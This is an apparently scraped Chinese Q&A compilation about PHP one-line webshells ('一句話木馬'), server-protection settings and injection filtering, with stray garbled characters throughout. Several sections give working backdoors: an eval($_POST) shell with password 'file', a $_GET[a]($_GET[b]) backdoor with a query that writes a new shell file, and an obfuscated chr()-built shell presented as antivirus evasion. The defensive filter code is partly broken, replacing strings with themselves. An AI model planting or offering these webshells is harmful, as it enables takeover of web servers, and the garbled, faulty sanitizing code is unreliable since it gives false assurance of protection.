❶ 寫一個php一句話木馬密碼為file
PHP一句話木馬是一種利用PHP的eval函數執行任意代碼的後門程序。一般格式為雹殲培:
<?php @eval ($_POST ['password']);?>
其中,password是連接木馬時需要輸入的密碼,可以自定義。如果您想要寫一個密碼為file的一句話木馬,那麼可以這樣寫:
<?php @eval ($_POST ['file']);?>
請注意,這種木馬非常源唯危險,可能導致網站被黑客入侵或破壞,請謹慎使用改橡。
❷ php一句話木馬過安全狗
年前做了困扒一個採集項目,也是有安全狗,光是PHP是行不通的,需要使用PHP來模汪首昌擬瀏覽芹猛器訪問,用一個中間件phpstorm就可以了。
❸ 伺服器安全狗怎樣配置
導語:網站安全狗是安全狗旗下的一款集網站內容安全防護、網站資源保護、網站加速及網站流量保護功能為一體的伺服器工具。下面我為您收集整理了伺服器安全狗配置,歡迎閱讀!
1、下載網站安全狗到伺服器上,安裝完成後,即可對網站進行防護。在網路上搜索「安全狗」就可以看到官網信息。
2、可利用掃描功能 對網站進行整體掃描,看網站是否存在安全威脅,如是否被掛馬、被掛黑鏈、是否存在網頁木馬、以及畸形文件等。
3、開啟主動防禦。包括網站漏洞防護、網馬防護、危險組件防護、禁止IIS執行程序、一句話後門防護。【開啟之後記得要點擊保存,才能生效】
網站漏洞防護可以防SQL、XSS等注入行為;
網馬防護主要是攔截上傳或瀏覽的網頁木馬,保護網站安全;
危險組件防護,前面攔截惡意代碼對組件的調用許可權;
禁止IIS執行程序,全面攔截IIS執行惡意程序;
一句話後門防護,可有效攔截PHP一句話後門。
開啟CC攻擊防護。
4、CC攻擊(ChallengeCollapsar)是藉助代理伺服器生成指向受害主機的合法請求,實現DOS和偽裝。模擬多個用戶不停的進行訪問那些需要大量數據操作,大量CPU時間的頁面,使得頁面打開速度緩慢。CC攻擊防護基本原理是防止一個IP多次不斷刷新而斷開與該IP得連接,防止伺服器癱瘓,達到了防攻擊目的。
5、在進行訪問規則設置的時候,如果是新手,建議直接使用默認值。同時該設置也支持自主設置,用戶可根據實際情況設置參數,已達到最佳防護效果。
開啟資源保護,包括資源防盜鏈、網站特定資源保護、網站後台防護等,保護網站安全。
6、在網站後台防護中,建議啟用臨時黑名單,比如說60秒內非法訪問3次,將會被凍結5分鍾,5分鍾後才可繼續使用。參數,用戶可以根據自己的實際情況進行設置。設置後,記得點擊保存生效。
啟用網站加速,主要針對圖片、視頻、js、flash等靜態資源進行加速,操作簡單易用。
網站加速功能默認是關閉的,如有需要可進行開啟。點擊「開啟按鈕」開啟網站加速服務,隨後把想加速的.網站添加到列表中並開啟加速即可。(需要注意的是,如果沒有加入安全狗服雲,點擊開啟時,就會看到一個提示:「加入服雲,才能開啟使用網站加速功能」。)
7、IP黑白名單的設置。
IP白名單設置可以通過設置一些值得信賴IP地址為白名單地址,從而使它們能夠順利的訪問網站;
IP黑名單是相對白名單進行設置的,目的是為了通過設置一些不良IP地址為黑名單地址,從而限制它們訪問網站。
用戶可以點擊「啟用」選項開啟IP黑白名單功能,設置好後需要保存!
8、可以在網站安全狗防護日誌中查看到每日防護具體信息,便於你及時調整安全防護措施。同時,如果想把哪個被攔截IP添加到IP黑白名單,可直接選中某個日誌,右鍵單擊即可把IP添加到黑白名單中。
網站安全狗的功能很強大,還有很多細節信息並沒有一一寫出來,大家如有需要可以到官網詳細了解一番。同時安全狗的其他產品服務:伺服器安全狗、安全狗服雲等也可以了解下,比如說:安全狗服雲手機端,可以遠程管理伺服器和網站安全等。
❹ 如何防止代碼注入攻擊在PHP
一,HTML防注入。
一般的html注入都是在字元串中加入了html標簽,用下JAVA代碼可以去掉這部分代碼。
代碼如下,自己封裝成方法即可。
String msge = "asdasdasdasd <div id=\"f\">asdfsdf";
System.out.println(msge);
msge = msge.replace("&", "&");
msge = msge.replace("<", "<");
msge = msge.replace(" ", " ");
msge = msge.replace(">", ">");
msge = msge.replace("\"", """);
msge = msge.replace("'", "&qpos;");
System.out.println(msge);
二、防SQL注入
最簡單最容易的是限制用戶輸入。
簡單點的就是不允許用戶輸入單引號 和 --,因為單引號號--在SQL中都是影響執行的。
但SQL注入是多方面的,防止的方法也有很多種。
1、地址欄禁止特殊字元防SQL注入
把特殊字元(如and、or、'、")都禁止提交就可以防止注入了。
2、php過濾html字元串,防止SQL注入
批量過濾post,get敏感數據
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
數據過濾函數
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
3、替換HTML尾標簽
function lib_replace_end_tag($str)
{
if (empty($str)) return false;
$str = htmlspecialchars($str);
$str = str_replace( '/', "", $str);
$str = str_replace("\\", "", $str);
$str = str_replace(">", "", $str);
$str = str_replace("<", "", $str);
$str = str_replace("<SCRIPT>", "", $str);
$str = str_replace("</SCRIPT>", "", $str);
$str = str_replace("<script>", "", $str);
$str = str_replace("</script>", "", $str);
$str=str_replace("select","select",$str);
$str=str_replace("join","join",$str);
$str=str_replace("union","union",$str);
$str=str_replace("where","where",$str);
$str=str_replace("insert","insert",$str);
$str=str_replace("delete","delete",$str);
$str=str_replace("update","update",$str);
$str=str_replace("like","like",$str);
$str=str_replace("drop","drop",$str);
$str=str_replace("create","create",$str);
$str=str_replace("modify","modify",$str);
$str=str_replace("rename","rename",$str);
$str=str_replace("alter","alter",$str);
$str=str_replace("cas","cast",$str);
$str=str_replace("&","&",$str);
$str=str_replace(">",">",$str);
$str=str_replace("<","<",$str);
$str=str_replace(" ",chr(32),$str);
$str=str_replace(" ",chr(9),$str);
$str=str_replace(" ",chr(9),$str);
$str=str_replace("&",chr(34),$str);
$str=str_replace("'",chr(39),$str);
$str=str_replace("<br />",chr(13),$str);
$str=str_replace("''","'",$str);
$str=str_replace("css","'",$str);
$str=str_replace("CSS","'",$str);
return $str;
}
三、專業的事情交給專業的工具去做。
安裝安全軟體。例如,在伺服器中安裝「伺服器安全狗」,可以設置防注入,防攻擊的設置,只要設置好安全規則,就可以屏蔽大多數攻擊入侵。
❺ php一句話木馬~呢
超級隱蔽的PHP後門:
<?php $_GET[a]($_GET[b]);?>
僅用GET函數就構成了木馬;
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%%29%29};
執行後當前目錄生成c.php一句話木馬,當傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應用
❻ 免殺php一句話一般有哪些加密方式
?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); $b({chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ?這個我是在後盾人學會的隱藏性很高,現在去有活動送價值兩千元後盾人會員卡